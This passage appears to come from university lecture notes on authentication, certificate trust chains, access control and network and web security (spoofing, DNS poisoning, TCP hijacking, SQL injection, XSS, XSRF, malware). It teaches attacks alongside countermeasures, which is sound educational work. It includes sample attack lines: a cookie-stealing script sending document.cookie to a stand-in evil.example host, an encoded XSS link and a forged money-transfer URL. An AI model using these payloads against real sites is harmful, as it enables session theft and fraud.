public key of Bob is 1234’. As the statement is signed by Charlie, Mallory can
no longer change the key without Alice noticing.
In the scenario above Alice grants Charlie the role of a Certificate Au-
thority (CA), i.e. she trusts that Charlie is an authority on the key of Bob.
How does she know Charlie is an authority? There could be another authority
Daisy that says so. How does she know Daisy is an authority on authorities?
This chain can be continued for a while but will need to end at some point at
a root CA Rob that Alice already trusts without the need for other authorities
vouching for Rob.
3 The term trust is used in many settings and in many different meanings. You will also
know the term from day to day life. Here we will focus on more technical interpretations of
the term trust [6, 13, 21], such as: a trusted statement is one which is supported by certificates.
BB 47 DE 23 5D 66 A1 72 CB C0 36 43 94 75 06 36 ... D2 96 20 4A 0F 33 83 63 38 57 16 C5 47 9F 20 71
(the 2048-bit public key contained in the certificate for www.tue.nl, given in the certificate as 256 hexadecimal bytes and abbreviated here).
However, as Alice does not know TERENA CA and its keys, Alice needs
to find out whether she can trust this key and trust TERENA CA to issue
such statements. For this the TERENA CA has a certificate from another CA,
USERTrust (as shown in Figure 7.7), that validates Terena’s key and states that
TERENA is trusted to issue certificates for websites. This chain of certificates
finally ends at a root CA; a well known root of trust that Alice knows and has
the public key of (typically built into Alice’s browser and/or operating system).
A risk with this approach is that trust is full and fully transitive; the root
and intermediate CAs are trusted to only certify fully trustworthy intermediate
CAs and to correctly verify the identities of all websites they issue certificates for.
However, if one step in the chain fails the whole system can break down. Several
incidents show that this can indeed happen. Hacking into the systems of the
CA is one way to obtain fake certificates.
For example:
– technet.microsoft.com/en-us/security/advisory/2798897,
– www.theregister.co.uk/2013/01/04/turkish_fake_google_site_certificate/
– www.comodo.com/Comodo-Fraud-Incident-2011-03-23.html
Use of outdated cryptography (such as the MD5 hash) also creates a risk; it
has been demonstrated that a fake CA certificate can be created by using MD5
hash collisions (www.win.tue.nl/hashclash/rogue-ca/, video at dewy.fem.tu-ilmenau.de/CCC/25C3/video_h264_720x576/25c3-3023-en-making_the_theoretical_possible.mp4).

Figure 7.7: The certificate for www.tue.nl that contains the public key as viewed
by the Safari web browser (the key itself not shown in the image).
In HTTPS there are basically only two roles; public key holder (the website
we want to visit) and CA that certifies public keys (for anybody, anywhere). If
we want to do distributed access control we may want more roles. This would
also limit the risk with respect to the problem above; we could have different
roles such as a CA for .nl, for tue.nl, etc. Then we could trust someone for
statements about e.g. www.tue.nl without having to trust them for statements
about www.bank.com. One way of doing this is role-based trust management,
which extends the ideas of RBAC to a distributed setting.
• In RBAC we have a table which assigns roles to users. Here this is done
with a list of (simple member) rules. For example, the rule TU/e.student
← Alice gives Alice the ‘student at TU/e’ role (a small evaluation sketch
follows below).
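The evaluation of such simple member rules can be sketched as follows (a toy Python illustration; the rule set and helper names are our own):

# Simple member RT rules: "TU/e.student <- Alice" means that TU/e assigns
# Alice the role 'student' (TU/e vouches for this role membership).
rules = [
    ("TU/e", "student", "Alice"),
    ("TU/e", "student", "Bob"),
    ("TU/e", "lecturer", "Charlie"),
]

def members(issuer, role):
    # Collect everyone assigned to issuer.role by a simple member rule.
    return {m for (i, r, m) in rules if i == issuer and r == role}

print(members("TU/e", "student"))   # {'Alice', 'Bob'}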
7.2 Authentication
Who are you? Depending on the situation you could answer this question by
giving your name (“I’m Bob”), giving the group you belong to (“I’m a student”),
or by giving the role you are playing (e.g. “I’m the bartender”), etc. Similarly
your identity in a computer system can be a unique property of you (your user
name, bank account number, public key) and/or something you share (being
a student at the TU/e) and/or something that you are only part of the time
(being a bartender in the weekend). If we take the same perspective as in the
attribute based access control above we can answer the question ‘who are you’
with a list of attributes.
Thus you can claim that you have a certain identity (a set of attributes) but
can you prove it (how can you authenticate)? How can someone else, a verifier,
verify that you as claimant indeed have the identity (attributes) that you claim
to have? There are three types of factors that can be used for authentication:
• what you have; e.g. the key to your house, a bankcard, an OV chip card,
etc.
• what you know; e.g. the hiding place of the spare key, a security code
(pincode), a password, your mother’s maiden name, etc.
• what you are; e.g. your face which is recognized by your roommate, your
voice on the phone, your behaviour (e.g. you’re serving drinks), etc.
One can of course also combine different mechanisms, e.g. a bankcard with
a security code combines the ‘what you have’ factor with the ‘what you know’
factor. Such multi-factor authentication is often used when there are high se-
curity requirements such as for use of your bankcard which represents a large
monetary value; the level of assurance5 is matched with the requirements of the
application. By using different factors together attacks which target a single fac-
tor no longer work; e.g. pickpocketing to steal the ‘what you have’ (bankcard, a
key) is not sufficient, nor is looking over your shoulder to learn what you know
(security code, password). Both attacks have to be combined making it much
harder to perform.
We thus have the identity (such as ‘Bob’, ‘age 21’, ‘student at TU/e’) of
a claimant and ways to check this identity by a verifier; the party that checks
whether you have a certain identity, or at least have certain attributes as part
of your identity. This is similar to the bouncer at the entry of the club checking
attribute ‘age 21’. Finally, we have a relying party that offers you a service based
on your attributes (such as the bartender serving you beer).
Thus far we have discussed authentication in general, but within computer
networks we are mostly concerned with remote electronic authentication (e-
authentication) where end-users prove their attributes to an online service
using an authentication protocol. (Recall the importance of establishing at-
tributes for access control discussed in the previous section.)
The first phase in an e-authentication system is a registration process where
applicants get issued credentials that link their identity (attributes) to tokens
(things the applicant controls). For example, Alice goes to the student regis-
tration desk and shows her passport. Then they check that Alice has paid her
tuition fees and issue Alice a student card with her picture on it. Here the
student card is a token which is linked (a credential) to the attribute ‘student
at the TU/e’ physically by the design with TU/e logo and electronically by the
same statement digitally signed by the TU/e (a certificate6 ). In this example
the TU/e asserts the student attribute. Different terms are used for the source
of attributes in different settings, for example Credential Service Provider,
Attribute Provider and Certificate Authority. Different naming typically indicates
some variations in what they provide and how they provide it. We will not go
into that level of detail here. Of course how strict this registration procedure is
and how much you trust the attribute provider influence how sure you can be
about the assigned identity (level of assurance).
5 also known as level of authentication
6 Electronic credentials are usually issued in the form of certificates.
4. Level 4, the highest level, requires that registration is in person and using
a primary, government issued ID (e.g. a passport) with a picture and a
second ID (such as a verified bank account number). The registration
authority must verify the primary ID at the issuer or at other reliable
sources. Non-repudiation of the application must also be provided (e.g. by
taking a photo or fingerprint of the applicant); the applicant should not be
able to deny making the application. In the authentication phase strong
cryptographic proofs using multiple factors are needed to demonstrate
control over the token(s).
In practice, the achieved level of assurance is the highest level for which all
of the requirements are met. Thus if I use a cryptographic protocol to prove
possession of a fingerprint and pin code protected smart card but the card was
issued to me without checking who I am, the assurance level is at Level 1. If I
go through a rigorous vetting procedure during registration but I use telnet to
log on (in which I ‘prove’ my identity by sending an unprotected password over
the network) not even assurance Level 1 is achieved.
Passwords - What you know Passwords are a very popular way of verifying
a claimant’s identity; they are familiar to the user and easy to implement on a
system, e.g. requiring no new hardware or complicated programming. They are
a key example of ‘what you know’ authentication. Important questions are how
a password is chosen, how it is stored by the verifier and how the claimant
communicates it to the verifier.
Finally the claimant has to tell the verifier the password. To prevent an
attacker from just trying a lot of passwords the verifier could apply a rate
limiting mechanism. After a number of incorrect entries the system could block
(or just slow down) login for that user (for some time, or until another action
is taken such as entry of a much longer PUK code for a blocked mobile phone
after three consecutive false PIN entries).
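A very basic rate limiting mechanism could be sketched as follows (a toy Python illustration under our own assumptions about the thresholds and lock-out time; a real system would also have to consider, for example, attackers deliberately locking out other users):

import time

MAX_TRIES = 3
LOCK_SECONDS = 300           # block the account for 5 minutes (illustrative value)
failed = {}                  # user -> (consecutive failures, time of last failure)

def may_attempt(user):
    tries, last = failed.get(user, (0, 0.0))
    if tries >= MAX_TRIES and time.time() - last < LOCK_SECONDS:
        return False         # account temporarily blocked
    return True

def record_result(user, success):
    if success:
        failed.pop(user, None)                   # reset counter on a correct password
    else:
        tries, _ = failed.get(user, (0, 0.0))
        failed[user] = (tries + 1, time.time())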
Overall passwords form an easy to use but not very strong form of authen-
tication. Protecting high value resources with only a password is not advisable.
(See also the requirements for the NIST levels of assurance.)
7.3 Summary
In this chapter we have addressed (e-)authentication and authorization which
are key security issues for networked applications. If we try to express these
notions in a single sentence we could say that authentication is assigning/estab-
lishing, presenting and validating attributes of users while authorization is de-
termining and enforcing the rights of users based on their attributes. There is,
however, no clear cut line between the two as they have some inherent overlap;
both authentication and authorization deal with trust and management of at-
tributes. Authentication starts at the user; getting an identity or attributes for
a user while authorization ends at the resource; linking usage to the attributes.
Which of the steps in between, bringing user attributes and resources together,
are part of authentication and which of authorization depends on the system
and your point of view. Additionally in literature there is sometimes even more
overlap; authentication systems may talk about rights associated with the es-
tablished attributes while authorization systems may talk about obtaining the
user’s attributes. Wherever you draw the line, with both authorization (access
control) and authentication in place we have a means to link users to their rights
over a computer network.
If you wish to learn more about Access Control there is the Master course
”Principles of data protection” (2IS27). Also the Bachelors course ”Legal and
Technical Aspects of Security” (2IC70) treats access control both from a legal
and a technical perspective.
7.3.1 Literature
Suggested reading
Bob.Friends ← Alice.Friends
Bob.Friends ← Charlie
Bob.Friends ← Dave
Charlie.Friends ← Charlie.Friends.Friends
Charlie.Friends ← Alice
Dave.Friends ← Eva
4. Describe the following scenario and situations (as far as possible) using an
access control matrix, a role based access control system, RT and XACML.
A Hospital has a patient electronic health record (EHR) system. An EHR
describes the medication history of a patient. There are two possible
actions on the EHR; read the content and add a new prescription.
• The hospital has doctors Daisy and Edward, nurses Nancy and Mark
and patients Alice, Bob and Charlie.
• Doctors are allowed to read the health records of patients.
• The doctor treating a patient is allowed to add new prescriptions and
may let a nurse read the health record of the patient.
• Daisy is treating Alice and Bob, Edward is treating Charlie.
• Nurse Nancy is assisting Daisy with the treatment of Alice.
Give a scenario in which Nancy reads the record of Alice; include the steps
involved and what happens in/with the AC system.
<Condition FunctionId="urn:oasis:names:tc:xacml:1.0:function:and">
  <Apply FunctionId="urn:oasis:names:tc:xacml:1.0:function:time-greater-than-or-equal">
    <Apply FunctionId="urn:oasis:names:tc:xacml:1.0:function:time-one-and-only">
      <EnvironmentAttributeSelector DataType="http://www.w3.org/2001/XMLSchema#time"
        AttributeId="urn:oasis:names:tc:xacml:1.0:environment:current-time"/>
    </Apply>
    <AttributeValue DataType="http://www.w3.org/2001/XMLSchema#time">09:00:00</AttributeValue>
  </Apply>
  <Apply FunctionId="urn:oasis:names:tc:xacml:1.0:function:time-less-than-or-equal">
    <Apply FunctionId="urn:oasis:names:tc:xacml:1.0:function:time-one-and-only">
      <EnvironmentAttributeSelector DataType="http://www.w3.org/2001/XMLSchema#time"
        AttributeId="urn:oasis:names:tc:xacml:1.0:environment:current-time"/>
    </Apply>
    <AttributeValue DataType="http://www.w3.org/2001/XMLSchema#time">17:00:00</AttributeValue>
  </Apply>
</Condition>
</Rule>
Chapter 8
Network and Web Security
For each threat we need to consider who the attacker is and what they are
trying to achieve; i.e. what is the attacker model that belongs to the threat.
Different attackers will have different capabilities. For example, an attacker
connected to the same hub will see all the messages being sent. An attacker
on the same, trusted, local area network (LAN) will be able to perform attacks
without having to worry about an Internet firewall protecting the LAN. Attacks
by different attackers will also have different goals. An attack may be aiming
to gain a capability, for example to get messages onto the LAN. Obviously such
an attack is only relevant for an attacker that does not yet have the capability;
only an outside attacker would need an attack for getting messages onto the
LAN as an inside attacker already has this capability.
To secure the network we need to consider attacks at different layers (see
for example Figure 8.1). Consider the network layer model for TCP/IP (see
Figure 8). An application process will use the transport layer’s connection ser-
vice to manage a connection with a remote process it wants to communicate
with. But to do this, the (human understandable) addresses used by the application,
such as www.tue.nl, need to be translated, using DNS, to IP addresses understood
by the network layer. An attacker may try to get the traffic redirected to
their IP address by disturbing this step (e.g. through DNS spoofing). Alterna-
tively, the attacker could influence lower layers to achieve the same result. For
example, an attacker could eavesdrop messages if she has access to the physical
layer.
MAC The MAC address is meant to uniquely identify a network interface.
Some wireless routers (access points) use MAC address ‘whitelisting’
as a security mechanism, allowing only access by the listed MAC addresses.
However, a network device can claim to have any MAC address as modern op-
erating systems allow MAC address changes in software. Some wireless routers
even support setting the MAC address that they use as some Internet modems
only talk to one fixed MAC address. Installing a new router would thus not be
possible without spoofing the MAC.1
the modem; some ISPs disallowed the use of multiple devices on the same connection in the
early days of broadband internet though mainly to prevent commercial use or sharing the
connection with other households. Consumers having multiple PCs, let alone other devices
with internet connection, was not very common back then. Technically this could thus be
classified hacking (‘computervredebreuk’ in Dutch) - for this type of considerations see the
electives course Legal and Technical Aspects of Security (2IC70).
ARP spoofing also has legitimate uses; for example, a backup server can take over the
role of a crashed server by claiming its IP. Other uses may be to redirect a new
machine on the network to a sign-up page before giving it access e.g. to (the
gateway and) the Internet.
Tools which monitor the network can be used to look for fake responses
(e.g. responses without requests, multiple responses to a request), poisoned ARP
caches (e.g. different values for the same IP), etc. To limit possible damage one
could also use static entries for key addresses (such as the gateway, important
local services) and not use ARP for these addresses. A disadvantage here is the
maintenance involved; if any of the static addresses change, all devices on the
network have to be updated. Also, recall that any device can claim to have any
MAC address so using the correct MAC address does not guarantee that the
message goes to the correct machine.
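A monitoring tool along these lines could, for instance, keep track of which MAC address answered for each IP and warn when conflicting answers appear. The sketch below (our own Python illustration) assumes the ARP replies have already been captured and parsed into (IP, MAC) pairs:

# Detect a possible poisoning attempt: two different MACs claiming the same IP.
seen = {}   # ip -> mac first observed for that ip

def check_arp_reply(ip, mac):
    previous = seen.setdefault(ip, mac)
    if previous != mac:
        print(f"WARNING: {ip} was announced by {previous}, now also by {mac}")

check_arp_reply("192.168.1.1", "aa:bb:cc:dd:ee:ff")
check_arp_reply("192.168.1.1", "11:22:33:44:55:66")   # triggers the warning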
Instead of trying to prevent the ARP spoofing we can try to solve this at
the higher network layers, taking into account the fact that the lower layer may
be unreliable in the design of protocols for the higher layers.
IP Like the MAC address, the IP address is just a plain text string inside
the message. Spoofing an IP address in a message is simple; just change the
IP header of the message. (See Figure 8.1: put the IP address you want and
compute the corresponding header checksum.) The message will then appear to
come from (or be intended for if you change the destination) that IP address.
To help mitigate attacks based on IP spoofing one can use firewalls to block
messages from outside the network that claim to come from an IP on the local
network. Also, it may be possible to trace back the source of the message
(if the routers forwarding the message allow this), which may help find the
source of the attack, or at least defend against it closer to its source (which may
be important e.g. in denial of service attacks). Note that the attacker model
has changed compared to the discussion on e.g. MAC. With MAC spoofing we
consider an attacker on the local network. IP spoofing is basically possible
for any attacker. The firewall defense clearly only makes sense when we are
dealing with an outside attacker. (As we have seen above an attacker on the
local network can likely mount a more powerful attack, actually claiming the IP
rather than only doing IP spoofing.)
IPsec is a set of protocols for authentication and encryption of IP packets.
It supports mutual authentication of the agents involved. In transport mode, to
protect confidentiality, the content of a packet is encrypted. The header is not
modified (so as not to interfere with routing on the network). The integrity
of the packet payload and parts of the packet header can also be protected.
In tunnel mode, the entire packet, including header, is encrypted and then the
result is sent as the payload of a new IP packet.
IPsec was developed as part of the IPv6 standard (though it can also be
employed in IPv4), but not all implementations of IPv6 include IPsec. Security
associations are basically keys used to communicate, along with algorithms,
protocols and settings used. IPsec uses Internet Key Exchange (IKE) to set up
security associations. It uses the Diffie–Hellman (DH) key exchange to set up
a shared session key (or to be more precise a shared secret from which keys are
derived). It can also use certificates to authenticate parties.
When you initially set up an IPsec connection, you have some confidence that
you will securely communicate with the party that you set up the connection
with; the confidentiality and integrity of the communication content can be
protected. However, an authentication phase is still needed in which you ensure
that the party you set up the connection with is actually a party you want to
communicate with. This introduces issues of policies, managing secrets (e.g. keys),
etc. which we will see returning in following lectures.
TCP The TCP protocol uses sequence numbers to identify blocks of communi-
cation and these sequence numbers form a basic form of authentication; packets
are only accepted by the receiver if the right sequence number is used.
If we can predict (see e.g. [5]) the (initial) sequence number that the server
will use, we can use a spoofed IP and guessed sequence number to start our own
session with the server; we don’t see the responses but we can issue requests
which will be accepted as coming from the (trusted) client. We do need to
prevent the real client from reacting to messages, as seeing an unexpected sequence
number from the server will cause it to send a reset which would break
our connection. Note that this attack is more a fake session initiation than a
session hijacking attack but is typically seen as belonging to the category of
session hijacking attacks.
Clearly if we can somehow see the communication with the server we can
simply read the messages and the sequence numbers within them. (We could
for example pretend to be a gateway between the server and the client networks
with the techniques described above or we could also try to get responses from
the server to be sent back by using source routing; in which the sender of the
packet can indicate (part of) the route that the return packet should follow.
However, source routing is nowadays usually disabled.)
A session between a client and server may start with authentication of the
client. In this case we may want to actively take over an (authenticated) session
rather than try to start our own new one. If we can see the traffic to/from the
server we can wait for a connection to be created and authentication to complete,
eavesdrop the sequence numbers used and then inject our own messages with IP
spoofing using the eavesdropped session numbers. Variants of this attack differ
in how they deal with the client and server responses. For example we can
take down the client after the session has started to prevent it from interfering
with our stolen session. We could also desynchronize the client and server by
resetting the connection on one end but not the other; we now act as a man
in the middle forwarding the responses of the client and the server (adapting
the sequence numbers) when we want and changing the messages as we please. If
the session includes setting up encryption keys then this type of man in the
middle attack can also break protection at higher network levels that rely on
this encryption.
A problem with some variations of the attack can be so called ‘ACK storms’
which can give away the attack. The server acknowledges the data that we
send to it but will of course send its acknowledgment packets to the client. If
we don’t prevent these from reaching the client it will, upon receiving these
packets, notice that the acknowledgment number is incorrect and send an ACK
packet back with the correct sequence number in an attempt to re-establish a
synchronized state. However, this response itself will be seen as invalid by the
server, leading to another ACK packet, creating a loop that continues until one
of the ACK packets is lost in transit.
DNS: Domain (URL) to IP DNS (amongst its other services) translates
human readable addresses (domains), such as www.tue.nl, to IP addresses.
A client (e.g. a web browser) typically keeps a local cache (in the browser itself
or in the OS running the browser) of the domain-IP mapping. However, for
new domains it will need to contact a name server. A local name server is
typically configured along with the IP address of the machine (manually or as an
optional part of DHCP). To look up the address, this local name server will recursively
make other calls if they are needed to find the address as we discussed earlier
in Chapter 3. The local name server has a cache of its own.
The example in Figure 8.5 shows a possible flow of events. If (1) the client
tries to look up www.tue.nl and (2) this domain is not in the cache the name
server will (3) ask the root name server. A 16-bit ID is included in the query and
an answer is linked to the query by checking its ID which should be the same.
The root name server does not have (4) the IP for domain www.tue.nl itself but
does know which name server is responsible for the top level domain .nl; let’s
say this is for example ns.sidn.org. Thus the root name
server refers the requester to this server (5). This reference is typically given
by ‘name’. Here the name server already knows (6) where to find ns.sidn.org
from its cache (otherwise it would first have to do another DNS lookup). Thus it
contacts (7), the server which again will do a redirection (8), now to ns.tue.nl.
Here the name server for the domain is actually within the tue.nl domain.
While ns.tue.nl is responsible for (known as the ‘authoritative name server’ of) the
domain tue.nl, including ns.tue.nl, if we do not know the IP for ns.tue.nl
we can of course not ask it for its own IP. To solve this the .nl name server
stores the IP address of ns.tue.nl (a so called glue record) and also sends this
with its response in (9). This response is stored in the cache (10). Finally we
get the IP we are looking for (11,12) which is stored in the cache and returned
to the client (not depicted).
There are several types of attacks possible on the DNS scheme. Figure 8.6
illustrates, using the same setting as the example in Figure 8.5, two attacks in
which the attacker is a client who is trying to ‘poison’ (i.e. insert a fake record
into) the cache of a name server (Target NS). In the first attack the attacker
sends a lot of requests for the address it wants to poison. If the address is not
yet in the cache, the name server will send out requests for this address. The
attacker in the meantime sends many fake replies to this request containing a
fake (attacker controlled) IP and using different values for the ID. If one of the
IDs used by the attacker matches one of the IDs used in the request of the name
server the response will be accepted and the attacker’s IP address will be linked
to the website (www.tue.nl) in the cache of the name server. Other users of the
same name server will now be directed to the attacker when they try to visit
www.tue.nl.
In a variation of the attack above, the attacker asks for a non-existent domain.
The advantage is that the domain will for sure not be in the cache of the local
name server and no name server will resolve the domain so the attacker has no
competition for its response queries. But what use is getting the name server to
have a false record for a non-existent domain? The clue is the use of glue records;
if the attacker can get the name server to accept her response she can include a
glue record which will also be stored and can make an important domain name
(e.g. that of a name server ns.tue.nl) point at her IP.
Not only the name server but also the client itself may be targeted. For
example (see Figure 8.7) an evil web site could include many items from the
www.tue.nl domain. If the client visits the page this will cause many requests
for www.tue.nl and the attacker can send many responses at the same time,
hoping to match the ID of one of the requests.
DNSSEC One possible defense against the DNS attacks described above is
to authenticate responses using digital signatures.
(Side Note) Digital signatures are important. The signer encrypts his message
or a hash computed from this message with his private key (only known to the
signer) to create a signature that is communicated together with the original
message. The result is a packet that contains the original message plus the
signature, called a ‘signed’ message. The receiver can use the public key of the
signer (known to everyone) to decrypt the signature and compare the outcome
with the hash computed again at the receiver. This is shown in Figure 8.8. (End
of Side Note)
Figure 8.8: Digital signature usage. Note that Bob’s private key should not be
reproducible from his public key. (Figure by Kurose and Ross)
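As an illustration of the sign-and-verify flow in the side note, the sketch below uses the Python ‘cryptography’ package (our own example; DNSSEC itself uses its own record formats, key types and key management rather than this code):

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

# Bob generates a key pair; the private key stays with Bob, the public key is published.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

message = b"an example DNS record to be signed"
signature = private_key.sign(message, padding.PKCS1v15(), hashes.SHA256())

# Anyone holding the public key can check that the message was not altered;
# verify() raises an exception if the message or the signature was changed.
public_key.verify(signature, message, padding.PKCS1v15(), hashes.SHA256())
print("signature valid")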
At the application layer the content of the communication becomes more
important; we have already seen some examples such as the ‘ping
of death’ where an oversized payload causes an error in the application handling
the ping messages. While other layers simply treat the payload as a binary
blob to be transported, at the application layer the content gets processed and
interpreted. As the content may come from untrusted parties this opens up the
risk of attacks through content that is interpreted incorrectly. Thus here we
will look at the content of the communication, for example for security of web
services we need to carefully consider user input to those services.
Web services need to collect information from the user to do their job; the
news article to display, the address to dispatch an order to, etc. Information
collected, through setting parameters in the links or explicitly entered in forms,
can be manipulated by an attacker. Sometimes changing the user-id in the
address bar is already enough to get at the content of another user. Forms
used to gather user input may contain checks (e.g. is an email address format
correct, does the text entered in the telephone field contain only numbers, etc.).
However, on the server end one should not rely on such checks as an attacker
can simply change the data after the check or send its own (unchecked) data
without using the form at all.
When doing a blind injection, where the structure of the database and/or
the queries constructed by the web application are not known, some effort is first
required to find this structure. Some web applications, when getting an error
from the database, simply display the error to the user. This may be useful to
the application developer for debugging purposes but will also provide a lot of
valuable information to the attacker. For example, the query used, tables that
exist/do not exist, etc. Sometimes the application filters the error only showing
that some error occurred. Even only being able to see whether an error occurs,
or how long it takes before the web application responds, gives a way
to extract information about/from the database.
What can be done to prevent SQL injections? The web application can
employ several countermeasures. The main one is input filtering. A basic step
could be to check the size of the input; e.g. if the input is a pincode it should
only be a few characters long. This would already make it more difficult to
construct successful SQL exploits. A stronger defense would be to ensure that
the user input is not interpreted as being part of the query by checking the
input from the user for special characters (e.g. ’) or sequences. The database
API may actually have a filtering function that achieves this, which should then
be used so the web developer does not have to write the code for it (with a risk
of errors and/or oversights); for example using mysql_real_escape_string($_-
POST[’naam’]); instead of just $_POST[’naam’]; in Figure 8.11. Of course this
needs to be done for all user inputs in all scripts. This is a main reason why
these vulnerabilities still exist; even if the script developer is aware (not all are),
it is easy to forget it just once which may be enough to completely expose the
database.
When supported by the database, a way to safely get the input to the
database is to use parameterized queries. Instead of building a query string
which includes the user’s input, the query contains parameters and the user
input is passed to the database as values to be used for the queries. In this
way no confusion is possible between what is part of the query and what is user
input. Thus the user input cannot change the query/inject code into it.
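For example, with Python’s built-in sqlite3 module a parameterized query looks as follows (a sketch with an invented table; the point is that user input is passed as a parameter instead of being pasted into the query string):

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('Alice', 'secret')")

name = "Alice' OR '1'='1"     # malicious input from a form

# Unsafe: the input becomes part of the query and changes its meaning.
unsafe = "SELECT * FROM users WHERE name = '" + name + "'"
print(conn.execute(unsafe).fetchall())        # returns the whole table

# Safe: the input is passed as a parameter, never interpreted as SQL.
safe = "SELECT * FROM users WHERE name = ?"
print(conn.execute(safe, (name,)).fetchall()) # returns nothing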
In addition to the input one could validate the output of the query. Similar
to input size checking we can check whether the output matches our expectation;
if we are expecting a single record and get back a whole list something is likely
wrong and the results should not be used.
XSS Cross Site Scripting (XSS) is another example where user input forms
a danger to web applications and their users. In an XSS attack an attacker
gets a user(’s browser) to run code that seems to come from another (trusted)
website. User (attacker) input to the website is used to inject code (a script)
into a ‘trusted’ page. Coming from a trusted page, a victim’s machine will
allow execution of the code, which can then e.g. control communication with
the trusted site (become a ‘man in the middle’), steal information only meant
for the trusted site (private/confidential information, credentials, sessions keys,
etc.) or exploit local vulnerabilities to gain even more access to the victim’s
machine.
Consider a subscription to a news website ‘news.example.com’ (see Figure 8.11)
where users can place comments with an article which are then shown to all
users reading the article. An attacker Mallory could post a comment contain-
ing a script which would then be accepted by user Bob’s browser as part of
the ‘news.example.com’ website and thus has all the rights any script from
news.example.com would have. For example, it can read the cookies that
news.example.com has set when Bob logged in and send them to Mallory. With
those cookies Mallory can impersonate Bob at news.example.com.
A comment section is an obvious user input and news.example.com may, as
with SQL injections, employ input filtering, disallowing scripts (see also
countermeasures below). However, there are also other, less obvious, user inputs
that can be employed to launch an XSS attack as in Figure 8.12. To indicate
the selected article, news.example.com uses the ‘item’ parameter, which should
be set to the id number of some item. If a non-existent id number is used the
website will report that the given number does not exist.
The error message is a way for a user (e.g. Mallory) to inject code; by
setting item to some code instead of an article id that code will be injected into
a news.example.com page showing the error message. The script can be used to
hide the error message part so the page looks like a normal page. Now Mallory
can run code that seems to come from news.example.com but it runs on her
own machine under her account. To get the code to run on Bob’s machine she
needs to get Bob to follow the link she has constructed.
If Bob is well educated in security and is thus suspicious of ‘untrusted’ links,
Mallory will need to hide the fact that the link contains a script. She could dis-
play a link different from the actual link and combine this with tricks like: news.
example.com/archive?dummy="This-very-long-argument-....-hides-the
-rest-from-view"&item=<script>...</script> which
abuses the fact that Bob’s browser will likely only show the first part of a very
long link. She could also try to encode it; %3C%73%63%72%69%70%74%3E is the
same as <script> but may not be recognized as such, either by Bob or by a
naive input filter.
Other than educating the user not to follow untrusted links, even if they
seem to go to ‘trusted’ sites, there is little that can be done on the user side.
When visiting a page with a stored XSS or after Bob follows the malformed
link, Bob’s system is confronted with code that comes from the ‘right’ (trusted)
server. Distinguishing it from code that is legitimate is very challenging. (See
also Section 8.3 below.)
On the server side, as with SQL, input filtering is an important countermea-
sure. User input with special meaning should be translated into a ‘safe’ format.
When coding a web application one should thus be very careful with user input.
Note that filtering requires being able to distinguish between valid input and
harmful content. This may be difficult, for example for a webmail application
where the input is an email written in html. Removing dangerous parts but still
allowing the user to give all the types of input can thus be very difficult. Web
scripting languages typically provide some functions, e.g. the ‘htmlspecialchars’
function that replaces characters by their html encoding. This, however, is not
sufficient to make the user input ‘safe’ in the example. Additionally XSS input
filtering, as with SQL filtering, needs to be done on all relevant user inputs in
all scripts.
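In Python, the counterpart of ‘htmlspecialchars’ is html.escape; a minimal sketch of this kind of encoding (which, as noted above, is by itself not sufficient for every application; the attacker URL is invented) is:

import html

comment = '<script>document.location="http://evil.example/?c=" + document.cookie</script>'

# Special characters are replaced by their HTML entities, so a browser shows
# the comment as text instead of executing it as a script.
print(html.escape(comment))
# &lt;script&gt;document.location=&quot;http://evil.example/?c=&quot; + document.cookie&lt;/script&gt;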
Tool support to analyse scripts for vulnerabilities such as SQL injection and
XSS is thus desirable. There are tools which try to detect XSS vulnerabilities.
Such tools aim to ensure functions such as ‘htmlspecialchars’ are applied in a
sufficient way to make the input safe. As automatically checking user input
usage against what is dangerous in a given setting is not easy, such tools often
miss vulnerabilities and/or create many false positives, making them less conve-
nient to use. Similarly there are tools for SQL injection analysis as well as more
general code analysis tools to search for (security) bugs.
XSRF Cross-Site request forgery (XSRF) is another attack where user in-
put (in this case requests) is misused. While an XSS attack tricks a user(’s
browser) into trusting and running code, an XSRF attack aims to send autho-
rized but unintended requests to a (trusted) website. Consider a user visiting
evil.site.com while still logged in to bank.example.com. (See Figure 8.13.) On
the evil site there is a link to an ‘image’, located at url http://bank.example.
com/transfer.php?from=Bob&to=Mallory&amount=1000. The user’s browser
will follow this link to load the image. However, the link is not really an image
but a request to bank.example.com to transfer money. As Bob is already logged
in at bank.example.com the request will succeed.
A variation of the XSRF attack above, also shown in Figure 8.13, has the
same setting of Bob visiting evil.site.com while logged in, but this time at stor-
agebox.example.com where Bob stores his important files. Again a fake link will
be followed by Bob’s browser resulting in a request to storagebox.example.com
to login as Mallory. Bob’s session is thus replaced and he is now logged on as
Mallory. Of course Mallory does not store her important files here. Instead
she hopes that Bob will not notice the change before uploading an important
document. The document will go to Mallory’s account so she can also access it.
In this section we’ve seen several types of attacks against web servers and
their users. A general defense against these types of attacks is to (try to) de-
crease the value of what can be stolen; e.g. accepting authentication cookies
only from the right IP would make abuse of stolen cookies harder. We will look
at network defenses in general in Section 8.3. As a general conclusion for this
section we can state: data is more dangerous than you think. Not only unknown
programs or devices but also any data from an untrusted source can be a source
of attacks.
8.2.1 Malware
Above we have looked at some specific vulnerabilities of networks and the ma-
chines on a network. Different types of malware exploit such weaknesses to
infiltrate the system, replicate, spread and achieve some malicious goal.
Trojans are legitimate looking programs (or other content) that actually
carry malicious code inside. Viruses can replicate, usually involving some action
like running an infected program (like biological viruses need a host organism,
computer viruses infect programs). Worms are able to replicate by themselves,
without the need of human action. Well known worms, such as conficker, spread
around networks (e.g. the Internet) exploiting vulnerabilities of network services
and machines. Adware is a type of software that automatically shows advertise-
ments or redirects your searches to advertising websites, in order to generate
revenues for its creator. (This is not necessarily malicious, however many types
of adware try to hide on your system, avoid uninstall and/or gather information
without your consent.) Classification of malware into these categories, however,
is sometimes difficult and terms are commonly mixed, using e.g. virus for any
type of malware.
While some hacks, viruses and worms may have been ‘just to see what I can
do’, i.e. idealistic, to demonstrate the vulnerability or simple vandalism, modern
malware is for the most part targeting big businesses or is even used for digital
warfare. The conficker worm, for instance, installs scareware (showing pop-ups
to get the user to buy a fake anti-virus solution) and creates a botnet; a network
of machines under control of the attacker, which can then be used for sending
spam, distributed DoS attacks, renting out to others, etc. The worm has an
update mechanism used to download its software for its malicious activities as
well as updates to its spreading mechanism and protection against updates of
anti-virus software that would be able to protect against it.
(Zero-day) vulnerabilities, exploits, virus building kits and botnets are com-
